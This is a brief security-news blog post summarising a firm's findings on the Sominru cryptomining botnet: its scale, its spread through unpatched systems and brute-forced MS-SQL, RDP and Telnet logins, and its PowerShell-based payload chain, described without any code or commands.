Pipeline Blog

The Return Of Sominru (Cryptomining botnet)

The Return Of Sominru (Cryptomining botnet)

The crypto mining botnet Sominru has been around since 2017, but it resurfaces with a bombastic campaign targeting Asia primarily but also affected Europe and the USA. It affected more than 90000 devices on multiple networks worldwide.

We are presenting the detail from our source, Quardicore— a security firm based in Boston.

Quardicore announced in August that they accessed a core server, which belonged to threat group stealing data and credentials. The firm examined the server and monitored the activities, and found out the presence of a botnet whose reach was on 4900 networks. And it was infecting 4700 devices on average per day. The researchers also found a malware hosted on 65 servers and expanded its network. On average, the malware had at least three devices on each network.

Reason of Breach in Security

According to Quardicore, most victims were unaware of the presence of botnet or any malware, and the infected devices lack the latest patching in their security systems. All victims had one common thing that they had not patched security vulnerabilities according to the latest updates.

Furthermore, ISPs were not blocking malicious activities through their servers, and this freedom caused the creation of a successful botnet campaign. Goldberg, a security analyst from Quardicore, said that ISPs are not protecting the business customers similar to home users. And all ISPs are capable of monitoring all activities on their network, but ISPs are not proactive enough to block the latest attacks. That’s why Sominru Botnet remained unnoticed for quite a time.

Sominru Threat Group

This group has been around for two years, and their activities alerted many cybersecurity vendors because their method of attack is unique and targeting new unknown vulnerabilities.

The new techniques of Sominru threat groups included polymorphic malware, repackaged and modified malware, and open-source exploits. According to Carbon Black researchers, this threat group used Eternal Blue Scanning for lateral movement, which is very complex in nature, but all commands were either base64 encoded or just plain text.  The Sominru threat group managed to do crypto mining along with stealing data and credentials, which they monetized in the dark market.

Method of Compromising Devices

The Sominru campaign used a number of ways to compromise devices, which mainly included the use of brute force attacks on MS-SQL, Remote Desktop Protocol, and Telnet.

When the botnet is in the system, it downloads PowerShell script named blueps.txt, which runs a number of operations on the machine. Moreover, Blueps.txt executed three binary files—a worm downloader, a Trojan, and Master Boot Record Rootkit. The Sominru group used 20 power scripts during the campaign, and executable files are designed to steal any data or credentials if found relevant.

Final Words

The Sominru campaign captured the attention of Cybersecurity gurus because of two things— Manipulation of ISPs and Windows device targeting. The botnet created by the Sominru threat group successfully operated through various ISPs without being noticed for a long time, and this campaign showed new vulnerabilities in the Windows operating system. Gurus from Quardicore called the attack as “The return of Sominru with more vengeance.”

Security Alerts